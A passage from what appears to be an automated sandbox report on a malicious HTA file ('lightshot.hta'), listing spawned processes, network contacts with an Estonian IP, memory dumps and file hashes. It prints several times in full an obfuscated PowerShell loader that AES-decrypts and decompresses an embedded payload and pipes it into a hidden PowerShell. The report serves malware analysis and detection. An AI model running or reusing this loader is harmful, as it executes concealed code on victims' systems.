$SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS | powershell - }
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell.exe $bjKJNucK = 'AAAAAAAAAAAAAAAAAAAAAP6K+v/ILIzonFqWY3aMyfu65Aitbvrdlf1JTR+VHM/93Pf7W9XSL9oKmFg9V+qy7eBG0S0HcDJtKhMRJ3Q9l7qhshHWmSGG8dKhKozh29fz02LJqF75p00XN+M8aChOLhiqviflbGu7cJqrbrWEVM7I+svNVeMHi6RuXQg3kyji0gso+E8HnnYMnLf63ehVx7vxZM1uNnQOjwScVjqGSm+URXGtIivHGvS7vky4GJZoZsxf9RpCqeVgXa+3SYd3lT+/+i5jaP4JR3SIEZQkfN4AsMHwqS+l2uMmKP4+eY38Xpo7CromP9x0lgF9/+BppwkdSfBvKvcCwokBDbD9QX0rmGMo+aov1Pa6JMsUJndxd7gXYZ4NJgIxfsx3nG11k/xyeA3FKb9M5uN34DguAT8bLbYW0/uunjQ7jci7sDSqFGwM7cVHsu4uQ/vxCWA/VsIKoOpCnJsqL9e7yfTQZd8ZledgaTqPAiksHr6qeF2DrDm6GXq3tlt+swecebAo1zXCmXTtzABYsfOV3gKMT2wGmUa7+uZhQ2P27JDH936ZqiCjJhqDl0xxeHPOL0kSdCguQBfNCliXAOw0QT2did2+iIqeoIjfoocDqNEJhNhCCzeCOn2vP07dnK9t/mvilfzeTZnmj743sAV12jWIOTHgc/e4Q4N2+Rx9yp2vT1yz5c5HnhSztHp9gvRm0I/7U5UzD0KwVsJgs0usZMkANdJIBC+a5JNnLOv+mAQAufTMUMZULnuHz/rBoZTqw37f7chwuwDV6ZxoGqp2MbPqCgeFKQgIefOApO7TTNXN6yMHo0mWEKwTL7MKX2H8CjHqVMbhmQkkJkL+2XytOm7uFf2JB2OB+vcXheFaViJYbxyQz/VZC7uSNX21qrWcvFBOqJDTAQDXy6Uyj6yKKEYT0Hj5nHpOf6eaKo10Yx4GqfU1';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS | powershell -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe $bjKJNucK = 'AAAAAAAAAAAAAAAAAAAAAP6K+v/ILIzonFqWY3aMyfu65Aitbvrdlf1JTR+VHM/93Pf7W9XSL9oKmFg9V+qy7eBG0S0HcDJtKhMRJ3Q9l7qhshHWmSGG8dKhKozh29fz02LJqF75p00XN+M8aChOLhiqviflbGu7cJqrbrWEVM7I+svNVeMHi6RuXQg3kyji0gso+E8HnnYMnLf63ehVx7vxZM1uNnQOjwScVjqGSm+URXGtIivHGvS7vky4GJZoZsxf9RpCqeVgXa+3SYd3lT+/+i5jaP4JR3SIEZQkfN4AsMHwqS+l2uMmKP4+eY38Xpo7CromP9x0lgF9/+BppwkdSfBvKvcCwokBDbD9QX0rmGMo+aov1Pa6JMsUJndxd7gXYZ4NJgIxfsx3nG11k/xyeA3FKb9M5uN34DguAT8bLbYW0/uunjQ7jci7sDSqFGwM7cVHsu4uQ/vxCWA/VsIKoOpCnJsqL9e7yfTQZd8ZledgaTqPAiksHr6qeF2DrDm6GXq3tlt+swecebAo1zXCmXTtzABYsfOV3gKMT2wGmUa7+uZhQ2P27JDH936ZqiCjJhqDl0xxeHPOL0kSdCguQBfNCliXAOw0QT2did2+iIqeoIjfoocDqNEJhNhCCzeCOn2vP07dnK9t/mvilfzeTZnmj743sAV12jWIOTHgc/e4Q4N2+Rx9yp2vT1yz5c5HnhSztHp9gvRm0I/7U5UzD0KwVsJgs0usZMkANdJIBC+a5JNnLOv+mAQAufTMUMZULnuHz/rBoZTqw37f7chwuwDV6ZxoGqp2MbPqCgeFKQgIefOApO7TTNXN6yMHo0mWEKwTL7MKX2H8CjHqVMbhmQkkJkL+2XytOm7uFf2JB2OB+vcXheFaViJYbxyQz/VZC7uSNX21qrWcvFBOqJDTAQDXy6Uyj6yKKEYT0Hj5nHpOf6eaKo10Yx4GqfU1';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -
Network
Files
memory/2416-2-0x0000000072250000-0x00000000727FB000-memory.dmp
memory/2416-3-0x0000000072250000-0x00000000727FB000-memory.dmp
memory/2416-4-0x00000000026F0000-0x0000000002730000-memory.dmp
memory/2416-5-0x00000000026F0000-0x0000000002730000-memory.dmp
memory/2416-6-0x0000000072250000-0x00000000727FB000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 946a7636a5f35163fb6100aeca1b989a |
| SHA1 | 6c6243f68820cdda9cd92d49cfadd0866732983c |
| SHA256 | ae3453c8377ed232dc8322f88c7f5cf78a411de8e72c6dc22705675fcafefdc5 |
| SHA512 | 1a6027ad1cd889a502788ecc8277310e86e1be810124e4977a609b573b4574502be87906eb0649c757a2102c7563efb3b14563cf6c4b1a9fc448734ba691f26b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BTVKK3BKSRZFWS4OKQ3G.temp
| MD5 | 946a7636a5f35163fb6100aeca1b989a |
| SHA1 | 6c6243f68820cdda9cd92d49cfadd0866732983c |
| SHA256 | ae3453c8377ed232dc8322f88c7f5cf78a411de8e72c6dc22705675fcafefdc5 |
| SHA512 | 1a6027ad1cd889a502788ecc8277310e86e1be810124e4977a609b573b4574502be87906eb0649c757a2102c7563efb3b14563cf6c4b1a9fc448734ba691f26b |
memory/2752-17-0x0000000071BF0000-0x000000007219B000-memory.dmp
memory/2752-20-0x0000000002760000-0x00000000027A0000-memory.dmp
memory/2752-23-0x0000000071BF0000-0x000000007219B000-memory.dmp
memory/2272-26-0x0000000002090000-0x00000000020D0000-memory.dmp
memory/2272-30-0x0000000071BF0000-0x000000007219B000-memory.dmp
memory/2752-31-0x0000000071BF0000-0x000000007219B000-memory.dmp
memory/2272-32-0x0000000071BF0000-0x000000007219B000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2023-12-01 18:16
Reported
2023-12-01 18:19
Platform
win10v2004-20231127-en
Max time kernel
91s
Max time network
118s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\lightshot.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $bjKJNucK = 'AAAAAAAAAAAAAAAAAAAAAP6K+v/ILIzonFqWY3aMyfu65Aitbvrdlf1JTR+VHM/93Pf7W9XSL9oKmFg9V+qy7eBG0S0HcDJtKhMRJ3Q9l7qhshHWmSGG8dKhKozh29fz02LJqF75p00XN+M8aChOLhiqviflbGu7cJqrbrWEVM7I+svNVeMHi6RuXQg3kyji0gso+E8HnnYMnLf63ehVx7vxZM1uNnQOjwScVjqGSm+URXGtIivHGvS7vky4GJZoZsxf9RpCqeVgXa+3SYd3lT+/+i5jaP4JR3SIEZQkfN4AsMHwqS+l2uMmKP4+eY38Xpo7CromP9x0lgF9/+BppwkdSfBvKvcCwokBDbD9QX0rmGMo+aov1Pa6JMsUJndxd7gXYZ4NJgIxfsx3nG11k/xyeA3FKb9M5uN34DguAT8bLbYW0/uunjQ7jci7sDSqFGwM7cVHsu4uQ/vxCWA/VsIKoOpCnJsqL9e7yfTQZd8ZledgaTqPAiksHr6qeF2DrDm6GXq3tlt+swecebAo1zXCmXTtzABYsfOV3gKMT2wGmUa7+uZhQ2P27JDH936ZqiCjJhqDl0xxeHPOL0kSdCguQBfNCliXAOw0QT2did2+iIqeoIjfoocDqNEJhNhCCzeCOn2vP07dnK9t/mvilfzeTZnmj743sAV12jWIOTHgc/e4Q4N2+Rx9yp2vT1yz5c5HnhSztHp9gvRm0I/7U5UzD0KwVsJgs0usZMkANdJIBC+a5JNnLOv+mAQAufTMUMZULnuHz/rBoZTqw37f7chwuwDV6ZxoGqp2MbPqCgeFKQgIefOApO7TTNXN6yMHo0mWEKwTL7MKX2H8CjHqVMbhmQkkJkL+2XytOm7uFf2JB2OB+vcXheFaViJYbxyQz/VZC7uSNX21qrWcvFBOqJDTAQDXy6Uyj6yKKEYT0Hj5nHpOf6eaKo10Yx4GqfU1';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS | powershell - }
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell.exe $bjKJNucK = 'AAAAAAAAAAAAAAAAAAAAAP6K+v/ILIzonFqWY3aMyfu65Aitbvrdlf1JTR+VHM/93Pf7W9XSL9oKmFg9V+qy7eBG0S0HcDJtKhMRJ3Q9l7qhshHWmSGG8dKhKozh29fz02LJqF75p00XN+M8aChOLhiqviflbGu7cJqrbrWEVM7I+svNVeMHi6RuXQg3kyji0gso+E8HnnYMnLf63ehVx7vxZM1uNnQOjwScVjqGSm+URXGtIivHGvS7vky4GJZoZsxf9RpCqeVgXa+3SYd3lT+/+i5jaP4JR3SIEZQkfN4AsMHwqS+l2uMmKP4+eY38Xpo7CromP9x0lgF9/+BppwkdSfBvKvcCwokBDbD9QX0rmGMo+aov1Pa6JMsUJndxd7gXYZ4NJgIxfsx3nG11k/xyeA3FKb9M5uN34DguAT8bLbYW0/uunjQ7jci7sDSqFGwM7cVHsu4uQ/vxCWA/VsIKoOpCnJsqL9e7yfTQZd8ZledgaTqPAiksHr6qeF2DrDm6GXq3tlt+swecebAo1zXCmXTtzABYsfOV3gKMT2wGmUa7+uZhQ2P27JDH936ZqiCjJhqDl0xxeHPOL0kSdCguQBfNCliXAOw0QT2did2+iIqeoIjfoocDqNEJhNhCCzeCOn2vP07dnK9t/mvilfzeTZnmj743sAV12jWIOTHgc/e4Q4N2+Rx9yp2vT1yz5c5HnhSztHp9gvRm0I/7U5UzD0KwVsJgs0usZMkANdJIBC+a5JNnLOv+mAQAufTMUMZULnuHz/rBoZTqw37f7chwuwDV6ZxoGqp2MbPqCgeFKQgIefOApO7TTNXN6yMHo0mWEKwTL7MKX2H8CjHqVMbhmQkkJkL+2XytOm7uFf2JB2OB+vcXheFaViJYbxyQz/VZC7uSNX21qrWcvFBOqJDTAQDXy6Uyj6yKKEYT0Hj5nHpOf6eaKo10Yx4GqfU1';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS | powershell -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe $bjKJNucK = 'AAAAAAAAAAAAAAAAAAAAAP6K+v/ILIzonFqWY3aMyfu65Aitbvrdlf1JTR+VHM/93Pf7W9XSL9oKmFg9V+qy7eBG0S0HcDJtKhMRJ3Q9l7qhshHWmSGG8dKhKozh29fz02LJqF75p00XN+M8aChOLhiqviflbGu7cJqrbrWEVM7I+svNVeMHi6RuXQg3kyji0gso+E8HnnYMnLf63ehVx7vxZM1uNnQOjwScVjqGSm+URXGtIivHGvS7vky4GJZoZsxf9RpCqeVgXa+3SYd3lT+/+i5jaP4JR3SIEZQkfN4AsMHwqS+l2uMmKP4+eY38Xpo7CromP9x0lgF9/+BppwkdSfBvKvcCwokBDbD9QX0rmGMo+aov1Pa6JMsUJndxd7gXYZ4NJgIxfsx3nG11k/xyeA3FKb9M5uN34DguAT8bLbYW0/uunjQ7jci7sDSqFGwM7cVHsu4uQ/vxCWA/VsIKoOpCnJsqL9e7yfTQZd8ZledgaTqPAiksHr6qeF2DrDm6GXq3tlt+swecebAo1zXCmXTtzABYsfOV3gKMT2wGmUa7+uZhQ2P27JDH936ZqiCjJhqDl0xxeHPOL0kSdCguQBfNCliXAOw0QT2did2+iIqeoIjfoocDqNEJhNhCCzeCOn2vP07dnK9t/mvilfzeTZnmj743sAV12jWIOTHgc/e4Q4N2+Rx9yp2vT1yz5c5HnhSztHp9gvRm0I/7U5UzD0KwVsJgs0usZMkANdJIBC+a5JNnLOv+mAQAufTMUMZULnuHz/rBoZTqw37f7chwuwDV6ZxoGqp2MbPqCgeFKQgIefOApO7TTNXN6yMHo0mWEKwTL7MKX2H8CjHqVMbhmQkkJkL+2XytOm7uFf2JB2OB+vcXheFaViJYbxyQz/VZC7uSNX21qrWcvFBOqJDTAQDXy6Uyj6yKKEYT0Hj5nHpOf6eaKo10Yx4GqfU1';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.78.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| EE | 185.123.53.208:80 | tcp | |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.240.110.104.in-addr.arpa | udp |
| EE | 185.123.53.208:80 | tcp | |
| US | 8.8.8.8:53 | 193.78.101.95.in-addr.arpa | udp |
Files
memory/4300-0-0x0000000002AC0000-0x0000000002AF6000-memory.dmp
memory/4300-1-0x0000000071830000-0x0000000071FE0000-memory.dmp
memory/4300-2-0x0000000002B30000-0x0000000002B40000-memory.dmp
memory/4300-3-0x0000000005550000-0x0000000005B78000-memory.dmp
memory/4300-4-0x0000000005450000-0x0000000005472000-memory.dmp
memory/4300-5-0x0000000005D30000-0x0000000005D96000-memory.dmp
memory/4300-6-0x0000000005DA0000-0x0000000005E06000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tml2yce1.lj4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4300-16-0x0000000005F20000-0x0000000006274000-memory.dmp
memory/4300-17-0x0000000006410000-0x000000000642E000-memory.dmp
memory/4300-18-0x00000000064B0000-0x00000000064FC000-memory.dmp
memory/4300-19-0x0000000002B30000-0x0000000002B40000-memory.dmp
memory/4300-20-0x00000000076E0000-0x0000000007776000-memory.dmp
memory/4300-21-0x00000000068B0000-0x00000000068CA000-memory.dmp
memory/4300-22-0x0000000006930000-0x0000000006952000-memory.dmp
memory/4300-23-0x0000000007D30000-0x00000000082D4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | def65711d78669d7f8e69313be4acf2e |
| SHA1 | 6522ebf1de09eeb981e270bd95114bc69a49cda6 |
| SHA256 | aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c |
| SHA512 | 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7 |
memory/1512-27-0x0000000071830000-0x0000000071FE0000-memory.dmp
memory/4300-28-0x0000000071830000-0x0000000071FE0000-memory.dmp
memory/3224-29-0x0000000071830000-0x0000000071FE0000-memory.dmp
memory/3224-31-0x0000000002080000-0x0000000002090000-memory.dmp
memory/1512-30-0x0000000002FF0000-0x0000000003000000-memory.dmp
memory/1512-32-0x0000000002FF0000-0x0000000003000000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 360a15f45a9e5bdf1251023a6b1df0ea |
| SHA1 | d6a3643b8ebb2dc29b51d259bdf270ddaa7d6c18 |
| SHA256 | acc0e3dfaea599f208571597633c7f1b0647fa3d315910fcf2243f2a9b812190 |
| SHA512 | 46ec4adfd60fe1b69c5cac0a890fee90b0af3089c93e69e652e303239084c76c3e6a16b75c0197c12f0932c9a310b1e0f2113fdc3710f80739f051e99fefc697 |
memory/1512-52-0x0000000002FF0000-0x0000000003000000-memory.dmp
memory/1512-53-0x0000000007EE0000-0x000000000855A000-memory.dmp
memory/3224-54-0x0000000005FF0000-0x0000000006034000-memory.dmp
memory/3224-55-0x0000000006D70000-0x0000000006DE6000-memory.dmp
memory/1512-57-0x0000000071830000-0x0000000071FE0000-memory.dmp
memory/3224-58-0x0000000002080000-0x0000000002090000-memory.dmp
memory/3224-60-0x0000000071830000-0x0000000071FE0000-memory.dmp
memory/3224-61-0x0000000002080000-0x0000000002090000-memory.dmp
memory/3224-62-0x0000000002080000-0x0000000002090000-memory.dmp
memory/3224-63-0x0000000002080000-0x0000000002090000-memory.dmp
memory/3224-64-0x0000000007310000-0x0000000007342000-memory.dmp
memory/3224-65-0x000000006E0F0000-0x000000006E13C000-memory.dmp
memory/3224-66-0x000000006E250000-0x000000006E5A4000-memory.dmp
memory/3224-76-0x00000000072F0000-0x000000000730E000-memory.dmp
memory/3224-77-0x0000000007350000-0x00000000073F3000-memory.dmp
memory/3224-78-0x0000000007450000-0x000000000745A000-memory.dmp
memory/3224-79-0x0000000007AF0000-0x0000000007B01000-memory.dmp
memory/3224-81-0x000000007F3A0000-0x000000007F3B0000-memory.dmp
memory/3224-83-0x0000000071830000-0x0000000071FE0000-memory.dmp